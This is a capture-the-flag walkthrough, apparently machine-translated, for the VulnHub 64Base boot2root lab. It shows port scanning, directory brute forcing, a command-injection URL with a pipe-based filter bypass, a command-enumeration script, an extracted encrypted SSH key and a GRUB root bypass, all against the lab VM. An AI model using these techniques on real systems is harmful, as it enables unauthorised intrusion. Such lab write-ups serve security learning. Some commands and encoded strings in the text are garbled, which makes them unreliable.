VulnHub the Solution is simple 64Base: Boot2Root

Recently VulnHub has published a new way, new path, called 64Base Boot2Root. Jobs like article intended for beginners. So don't be surprised if some of the solutions seem too simple.

the

Start

In the description you can see the number of flags, and the format is:

There are 6 flags to collect. Each in the format of flag1{ZXhhbXBsZSBmbGFnCg==} Beat the Empire and steal the plans for the Death Star before its too late.

Downloaded the image, import settings, open the virtual machine properties, under Network, set the network bridge on our adapter, save, run. Continue looking for our with Nmap dev

the

sudo nmap -A 192.168.1.1-255-p1-65535

We get the following output:

the

Starting Nmap 7.01 ( https://nmap.org ) at 2016-12-12 22:13 MSK
Nmap scan report for 192.168.1.2
Host is up (0.0040 s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http Apache httpd 2.4.10 ((Debian))
4899/tcp open radmin
62964/tcp open ssh OpenSSH 6.7p1 Debian-5+deb8u3 (protocol 2.0)
MAC Address: 08:00:27:68:E7:F8 (Oracle VirtualBox virtual NIC)

2 of the 4 ports is successfully detected is 80 and 62964, and 2 ports, which is not identified with Nmap. But about them later.

the

flag1

Go to the address 192.168.1.2:80, get to the main page.



Where the eye catches the inscription: dmlldyBzb3VyY2UgO0QK

Decode it from Base64 and obtain a hint: view source ;D

OK, look at the code of the page, and next to this inscription see the comment:

the

<div class="site-heading">
<h1>64base</h1>
<hr class="small">
<span class="subheading">dmlldyBzb3VyY2UgO0QK</span>
<!--5a6d78685a7a4637546d705361566c59546d785062464a7654587056656c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5a77596d316a4d454e6e5054313943673d3d0a-->
</div>

After you convert HEX → ASCII → Base64 → ASCII

Get the first flag:

flag1{NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxrhpvqhjltdawszfpbmc0cg==}

Trying to convert the flag from base64 to ASCII, you can obtain credentials

64base:Th353@r3N0TdaDr01DzU@reL00K1ing4

the

flag2

And so, we have a username and a proposed password. Looking for available files and directories:

the

sudo dirsearch -r-u http://192.168.1.2 -e php,. txt,. bak w /usr/share/dirb/wordlists/big.txt -f-x 301,403

Found a page with Basic authorization /admin. Credentials, found in the last flag didn't fit. Ssh in with them, too, failed to connect. Apparently something was lost. After a brief search it was decided to parse the words from the pages of the website in a separate dictionary. The Python script helped:

Hidden text

#!/usr/bin/python3
import re
import requests
import sys

def repl(txt):
txt = txt.replace('<!', '').replace('>', ' ').replace('</', ' ').replace('\n', ' ').replace('<', ' ').replace('"', ' ').replace('=', ' ').replace(':', ' ').replace('--', ' ').replace('/', ' ').replace("'", " ").replace('©', ' ').replace(',', ' ').replace('#', ' ').replace('→a', ' ').replace('?', '').replace('.', '').replace(';', ' ').replace('(', ' ').replace(')', ' ').replace('{', ' ').replace('}', ' ')
return txt.strip()

words = []
url = sys.argv[1]
req = requests.get(url).text.splitlines()
for item in req:
item = repl(item)
tmp = [x.strip() for x in item.split(' ') if x.strip() != "]
for word in tmp:
if word not in words: words.append(word)

w = open(sys.argv[2], 'w')
for x in words:
w.write('%s\n' %(x))
w.close()

Do it for each page we found:

the

./parser.py http://192.168.1.2/index.html index
./parser.py http://192.168.1.2/about.html about
./parser.py http://192.168.1.2/post.html post
./parser.py http://192.168.1.2/contact.html contact
cat index contact about post | sort -u > words.lst

Start again search directory:

the

sudo dirsearch -u http://192.168.1.2/ -r -f-w words.lst -e php,. txt,. json,. bak x 301

There was another interesting directory. If you look at the file robots.txt, you'll find the entry:

Disallow: /Imperial-class/

Apparently it's one of the jokes of the author mentioned in the description. The transition is prompted for authentication, enter the login name and password obtained earlier, and we entered!

However, to rejoice too early, we were greeted by the message:

[] ERROR: incorrect path!.. TO THE DARK SIDE!

Looking at at Imperial-class I, we find the phrase:
Hmm, trying to jump at 192.168.1.2/Imperial-Class/BountyHunter get to another login page:



Looking at the source code, see the following:

Next encoded flag

<body bgcolor=#000000><font color=#cfbf00>
<form name="login-form" id="login-form" method="post" action="./login.php"> 
<fieldset> 
<legend>Please login:</legend> 
<dl> 
<dt> 
<label title="Username">Username:
<input tabindex="1" accesskey="u" name="function" type="text" maxlength="50" id="5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756" /> 
</label> 
</dt> 
</dl> 
<dl> 
<dt> 
<label title="Password">Password:
<input tabindex="2" accesskey="p" name="command" type="password" maxlength="15" id="584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c32" /> 
</label> 
</dt> 
</dl> 
<dl> 
<dt> 
<label title="Submit"> 
<input tabindex="3" accesskey="l" type="submit" name="cmdlogin" value="Login" /> 
<!-- basictoken=52714d544a54626d51315a45566157464655614446525557383966516f3d0a -->
</label> 
</dt> 
</dl> 
</fieldset> 
</form>

Combine, convert HEX -> TEXT -> Base64> TEXT, get the second flag:

flag2{aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2f0y2g/dj12Snd5dEZXQTh1QQo=}

this time the flag is coded hints link YouTube

the

flag3

Continue, we have a login form: 192.168.1.2/Imperial-Class/BountyHunter/index.phpafter trying several options, you may notice that whenever you send a POST request to the login.php, we are without any error redirects to index.php.

Try more to look at the process of redirection using the curl:

the

curl http://192.168.1.2/Imperial-Class/BountyHunter/login.php -H 'Authorization: Basic NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxrhpvqhjltdawszfpbmc0'

In response to the surprise, we received the following flag:

flag3{NTNjcjN0NWgzNzcvSW1wZXJpYWwtQ2xhc3mvqm91bnr5shvudgvyl2xvz2
luLnBocD9mPWV4ZWMmYz1pZAo=}

And a new hint encoded in it:

53cr3t5h377/Imperial-Class/BountyHunter/login.php?f=exec&c=id

the

flag4

Use the Hint from the previous flag and navigate to the url 192.168.1.2/Imperial-Class/BountyHunter/login.php?f=exec&c=id



Hmm, just remember the picture from the page post.html

Picture

Replace EXEC on the SYSTEM: 192.168.1.2/Imperial-Class/BountyHunter/login.php?f=system&c=id And get a new flag, prompt, and shell on the virtual machine.

flag4{NjRiYXNlOjY0YmFzZTVoMzc3Cg==}

In tips, find new credentials: 64base:64base5h377

the

flag5

A bit studying opportunities found. it becomes clear that the list of commands available to run, very limited, in addition there is a filter for slash. It remains to determine which of them is available to us.

Create a dictionary to iterate through available commands:

the

for item in $(ls /usr/sbin/ && ls /usr/bin/ &&ls /sbin/ && ls /bin/);  do  echo $item >> /tmp/unix_command2.lst; done
sort-u /tmp/unix_command2.lst > unix_command.lst

Then feed this dictionary into a Python script:

Code

#!/usr/bin/python

import requests
import sys, re

url = 'http://192.168.1.2/Imperial-Class/BountyHunter/login.php'
param = {'f':'system', 'c':"}
basic = ('64base', 'Th353@r3N0TdaDr01DzU@reL00K1ing4')

if len(sys.argv) == 1:
print('Usage: brute_sh.py [wordlist]')
sys.exit(0)

words = open(sys.argv[1], 'r').read().splitlines()
for item in words:
param['c'] = '%s --help' %(item)
req = requests.get(url, params=param, auth=basic)
if len(req.text.splitlines()) > 9:
print('Found cmd: %s' %(item))

And get this output:

Found cmd: base64
Found cmd: cat
Found cmd: id
Found cmd: locate
Found cmd: ls
Found cmd: nc
Found cmd: ps
Found cmd: w
Found cmd: wget
Found cmd: who
Found cmd: whoami

Not much, however, since we have not filtered the | character then substituting it at the beginning of the team, have the opportunity to perform any. After playing with the passed parameters
we get this request:

the

|locate admin|grep html|xargs find

The output will look like this:

/var/www/html/admin
/var/www/html/admin/index.php
/var/www/html/admin/S3cR37
/var/www/html/admin/S3cR37/flag5{TG9vayBJbnNpZGUhIDpECg==}
/var/www/html/admin/.htaccess
/var/www/html/admin/.htaccess
/var/www/html/admin/index.php

The flag was found, and with it a new hint: Look Inside! :D

the

flag6

We are asked to look inside that file. OK will do that:

the

#Copy the file in the available us directory
|locate admin|grep html|xargs find|grep TG|xargs cp-t .
#Change access
|ls|grep TG|xargs chmod 777

Opened in a browser, the file is a picture:



Run exiftool and see the metadata of this image

Hidden text

ExifTool Version Number: 9.46
File Name: flag5{TG9vayBJbnNpZGUhIDpECg==}.jpeg
Directory:.
File Size: 192 kB
File Modification Date/Time: 2016:12:16 05:32:02+03:00
File Access Date/Time: 2016:12:16 05:32:08+03:00
File Inode Change Date/Time: 2016:12:16 05:32:02+03:00
File Permissions: rw-------
File Type: JPEG
MIME Type: image/jpeg
JFIF Version: 1.01
Resolution Unit: inches
X Resolution: 72
Y Resolution: 72
Comment: 4c5330744c5331435255644a546942535530456755464a4a566b46555253424c52566b744c5330744c517051636d396a4c565235634755364944517352553544556c6c5156455645436b52460a5379314a626d5a764f69424252564d744d5449344c554e43517977324d6a46424d7a68425155513052546c475155457a4e6a55335130457a4f44673452446c434d7a553251776f4b625552300a556e684a643267304d464a54546b467a4d697473546c4a49646c4d356557684e4b325668654868564e586c795231424461334a6955566376556d64515543745352307043656a6c57636c52720a646c6c334e67705a59303931575756615457707a4e475a4a55473433526c7035536d64345230686f5533685262336857626a6c7252477433626e4e4e546b5270636e526a62304e50617a6c530a524546484e5756344f58673056453136436a684a624552435558453161546c5a656d6f35646c426d656d56435246706b53586f35524863795a323479553246465a335531656d56734b7a5a490a52303969526a686161444e4e53574e6f6554687a4d5668795254414b61335a4d53306b794e544a74656c64334e47746955334d354b31466856336c6f4d7a52724f45704a566e7031597a46520a51336c69656a56586231553157545532527a5a784d564a6b637a426959315a785446567a5a51704e5533704c617a4e745332465851586c4d574778764e3078756258467856555a4c5347356b0a516b557855326851566c5a704e47497752336c475355785054335a3062585a47596a5172656d68314e6d705056316c49436d73796147524453453554644374705a3264354f57686f4d3270680a52576456626c4e51576e56464e30354b6430525a5954646c553052685a3077784e31684c634774744d6c6c70516c5a7956566834566b31756232494b643168535a6a56435930644c56546b330a65475276636c59795648457261446c4c553278615a5463354f58527956484a475230356c4d4456326545527961576f315658517953324e52654373354f457334533342585441706e645570510a556c424c52326c71627a6b3253455248597a4e4d4e566c7a65453969566d63724c325a714d4546326330746d636d4e574c327834595663725357313562574d7854566870536b316962554e360a62455233436c52425632316863577453526b52355154464956585a30646c4e6c566e46544d533949616d6845647a6c6b4e45747a646e4e71613270326557565256484e7a5a6e4e6b52324e560a4d47684561316833556c647a6332514b4d6d517a5279744f616d3078556a56615445356e556d784f63465a48616d684c517a524263325a59557a4e4b4d486f7964444e4355453035576b39430a54554a6c4f5552344f4870744e58684757546c365633527964677042523342794d454a6f4f45745264323177616c4656597a46685a6e4e78595646594d465649546b7859564446615431644c0a616d63305530457a57454d355a454e4665555a784d464e4a65464671547a6c4d52304e48436a52524e57356a5a6c566f62585a3063586c3164454e7362444a6b5746427a57465a455a54526c0a6230517851327432536b354557544e4c554663725232744f4f5577724f554e516554677252453531626b5a4a6433674b4b3151724b7a64525a7939315546684c6354524e4e6a464a555467770a4d7a52566148565356314d30564846514f57463657444e44527a6c4d65573970516a5a57596b74505a555233546a68686157784d533170436377706d57546c524e6b464e4d584e3562476c360a53444675626e684c5433526155566431636e68715230704353584d324d6e526c6245317259584d356555354e617a4e4d64546478556b6732633364504f584e6b56454a70436974714d4867300a64555261616b706a5a30315965475a694d4863315154593062466c4763303153656b5a714e31686b5a6e6b784f53744e5a54684b525768524f45744f57455233555574456556564d526b39550a63336f4b4d544e575a6b4a4f65466c7a65557731656b6459546e703563566f3053533950547a644e5a575179616a4248656a426e4d6a4670534545764d445a74636e4d795932786b637a5a540a56554a4852585a754f4535705667707955334a494e6e5a46637a5254656d63776544686b5a45643255544278567a463254577455556e557a54336b765a544577526a63304e586845545546550a53314a7353316f32636c6c4954554e34536a4e4a59323530436b56364d45394e57466c6b517a5a4461555976535664305a3252564b32684c65585a7a4e484e4764454e4359327854595764740a5246524b4d6d74615a485530556c4a3357565a574e6d394a546e6f35596e4250646b554b556e677a534656785a6d354c553268796458704e4f56707261556c7264564e6d556e526d615531320a596c52365a6d5a4b56464d30597a513451303831574339535a5559765157464e654774695532524654305a7a53517047646a6c595a476b355532524f6458684853455579527a5249646b706b0a53584279526c5679566c4e7755306b344d48646e636d49794e44567a647a5a6e5647397064466f354d47684b4e47354b4e5746354e304648436c6c7059574531627a63344e7a63765a6e63320a57566f764d6c557a5155526b61564e50516d3072614770574d6b705765484a7665565659596b63315a475a734d32303452335a6d4e7a464b4e6a4a4753484534646d6f4b63557068626c4e720a4f4445334e586f77596d70795746646b5445637a52464e735355707063327851567974355247466d4e316c43566c6c33563149725645457861304d326157564a5154563056544e776269394a0a4d776f324e466f31625842444b3364785a6c52345232646c51334e6e53577335646c4e754d6e41765a5756305a456b7a5a6c46584f46645952564a69524756304d56564d5346427864456c700a4e314e61596d6f3464697451436d5a7553457852646b563353584d72516d59785133424c4d554672576d565654564a4655577443614552704e7a4a49526d4a334d6b6376656e46306153395a0a5a4735786545463562445a4d576e704a5a5646754f48514b4c3064714e477468636b6f78615530355357597a4f57524e4e55396851315a615569395554304a575956493462584a514e315a300a536d39794f57706c53444a305255777764473946635664434d56424c4d48565955416f744c5330744c55564f524342535530456755464a4a566b46555253424c52566b744c5330744c516f3d0a
Image Width: 960
Image Height: 720
Encoding Process: Baseline DCT, Huffman coding
Bits Per Sample: 8
Color Components: 3
Y Cb Cr Sub Sampling: YCbCr4:4:4 (1 1)
Image Size: 960x720

Copy the contents of the field Comment and perform the same transformation, as with the previous flags. At the output instead of the flag we were given a private RSA key:

Hidden text

----- BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,621A38AAD4E9FAA3657CA3888D9B356C

mDtRxIwh40RSNAs2+lNRHvS9yhM+eaxxU5yrGPCkrbQW/RgPP+RGJBz9VrTkvYw6
YcOuYeZMjs4fIPn7FZyJgxGHhSxQoxVn9kdkwnsmndirtcocok9rdag5ex9x4tmz
8IlDBQq5i9Yzj9vPfzeBDZdIz9Dw2gn2saegu5zel+6HGObF8Zh3MIchy8s1XrE0
kvLKI252mzWw4kbSs9+QaWyh34k8JIVzuc1QCybz5WoU5Y56G6q1rds0bcvqluse
MSzKk3mKaWAyLXlo7LnmqqUFKHndBE1Shpvvi4b0gyfiloovtmvfb4+zhu6jOWYH
k2hdCHNSt+iggy9hh3jaEgUnSPZuE7NJwDYa7eSDagl17xkpkm2yibvruxxvmnob
wXRf5BcGKU97xdorV2Tq+h9KSlZe799trTrFGNe05vxDrij5Ut2Kcqx+98K8KpWL
guJPRPKGijo96HDGc3L5YsxObVg+/fj0AvsKfrcV/lxaW+Imymc1MXiJMbmCzlDw
TAWmaqkRFDyA1HUvtvSeVqS1/HjhDw9d4KsvsjkjvyeQTssfsdGcU0hDkxwrwssd
2d3G+Njm1R5ZLNgRlNpVGjhKC4AsfXS3J0z2t3bpm9zobmbe9dx8zm5xfy9zwtrv
AGpr0Bh8KQwmpjQUc1afsqaQX0UHNLXT1zowkjg4sa3xc9dceyfq0sixqjo9lgcg
4Q5ncfUhmvtqyutCll2dXPsXVDe4eoD1ckvjndy3kpw+GkN9L+9CPy8+DNunFIwx
+T++7Qg/uPXKq4M61IQ8034UhuRWS4TqP9azX3CG9lyoib6vbkoedwn8aillkzbs
fY9Q6AM1sylizH1nnxKOtZQWurxjGJBIs62telmkas9ynmk3lu7qrh6swo9sdtbi
+j0x4uDZjJcgMXxfb0w5A64lYFsMRzFj7xdfy19+Me8JEhQ8KNXDwQKDyULFOTsz
13VfBNxYsyL5zGXNzyqZ4I/OO7Med2j0Gz0g21iHA/06mrs2clds6SUBGEvn8NiV
rSrH6vEs4Szg0x8ddGvQ0qW1vMkTRu3Oy/e10F745xDMATKRlKZ6rYHMCxJ3Icnt
Ez0OMXYdC6CiF/IWtgdU+hKyvs4sFtCBclSagmDTJ2kZdu4RRwYVV6oinz9bpove
Rx3HUqfnKShruzM9ZkiIkuSfRtfiMvbTzffjts4c48co5x/ReF/AaMxkbSdEOFsI
Fv9Xdi9SdNuxGHE2G4HvJdIprFUrVSpSi80wgrb245sw6gtoitz90hj4nj5ay7ag
Yiaa5o7877/fw6YZ/2U3ADdiSOBm+hjV2JVxroyUXbG5dfl3m8Gvf71J62FHq8vj
qJanSk8175z0bjrXWdLG3DSlIJislPW+yDaf7YBVYwWR+TA1kC6ieIA5tU3pn/I3
64Z5mpC+wqfTxGgeCsgIk9vSn2p/eetdI3fQW8WXERbDet1ULHPqtIi7SZbj8v+P
fnHLQvEwIs+Bf1CpK1AkZeUMREQkBhDi72HFbw2G/zqti/YdnqxAyl6LZzIeQn8t
/Gj4karJ1iM9If39dM5OaCVZR/TOBVaR8mrP7VtJor9jeH2tEL0toEqWB1pk0uxp
-----END RSA PRIVATE KEY-----

Use it to connect via ssh

the

ssh root@192.168.1.2 -p 62964 -i key.rsa

The password is easy to guess written on the picture, after a successful connection, we get the last flag:

flag6{NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxntk1ndu1mza0ztu0nmi3ytrkndq1mtm1n
GU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNgq3ytrkmzu0zddhndkzmtrmntq1ntm0ngu
0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1ndvhnjg0ztu0nmizmtrln2e2mzmzngu3ytu5
MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5nzg0zddhndkzmtrlnme0zdm0ngu2ytq5mza0
ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0zddhntuzmzrmntq1njy4ngu1ndyzmza0ztzhnj
M3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTe3nzu5nte2zjnkmgek}

In which the encoded command: base64 -d /var/local/.luke|less.real
And root access to the virtual machine. Job passed!

PS There is still at least 1 way to pass this lab.

Dirty hack

Immediately after booting the image in VirtualBox, you may receive the authorization request. During boot you will notice that used GRUB, so I reboot, waiting for the OS selection menu, and change boot options:


Downloaded and get root. Looking around in the system, go to the directory of the site.
By running the command:

the

cd /var/www/html
ls-l | wc-l

Get the number of items in this directory, they turned out to be 443. We still need the directory admin. After reviewing its contents in the folder S3cR37 find the second flag.



Here you can find the password hash for this directory, and user name:
64base:$apr1$SNPbKyA8$0.2pIMdx4JVVA6jsX/Ru30



Watching the contents of the file index.html and get the first flag. Run the command:

the

grep -r flag3 /var/www/

And we find the third flag



Similarly, we find the fifth and sixth flags:

the

root@64base:~# find /var/www/html/ -name flag*

/var/www/html/admin/S3cR37/flag5{TG9vayBJbnNpZGUhIDpECg==}

the

root@64base:~# grep -r flag6 /

/root/.profile:echo "flag6{NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxntk1ndu1mza0ztu0nmi3ytrkndq1mtm1ngu0ndrkn2e0zdu0nwe2otrlndq2yjmwngq3ytrkmzu0zddhndkzmtrmntq1ntm0ngu0ndzimzm0ztzhntk3otrlndq2mzdhngy1ndvhnjg0ztu0nmizmtrln2e2mzmzngu3ytu5mza1otdhnwe2yjrln2e2nzdhngq1ndu5nzg0zddhndkzmtrlnme0zdm0ngu2ytq5mza0ztdhntuzmjrlmzi0ntmyngq3ytyzmzu0zddhntuzmzrmntq1njy4ngu1ndyzmza0ztzhnjm3ytrlndq0zdmyngu3ytrlnmi0zdmynte3nzu5nte2zjnkmgek}"

Well, from file /var/www/html/Imperial-Class/BountyHunter/login.php extract and decode Cheverny flag:

$_u = base64_decode('ZWNobyAnPGg0PmZsYWc0e05qUmlZWE5st2pzmfltrnpavfzvtxpjm0nnpt19pc9ond4no2nhdc5yzwfsic9ldgmvaxnzdwu7zgf0ztt1bmftzsatytsvc2jpbi9pzmnvbmzpzybldggwfc91c3ivc2hhcmuvz3jlcc5yzwfsigluzxq7zwnobwo=').' '.$_s;

Article based on information from habrahabr.ru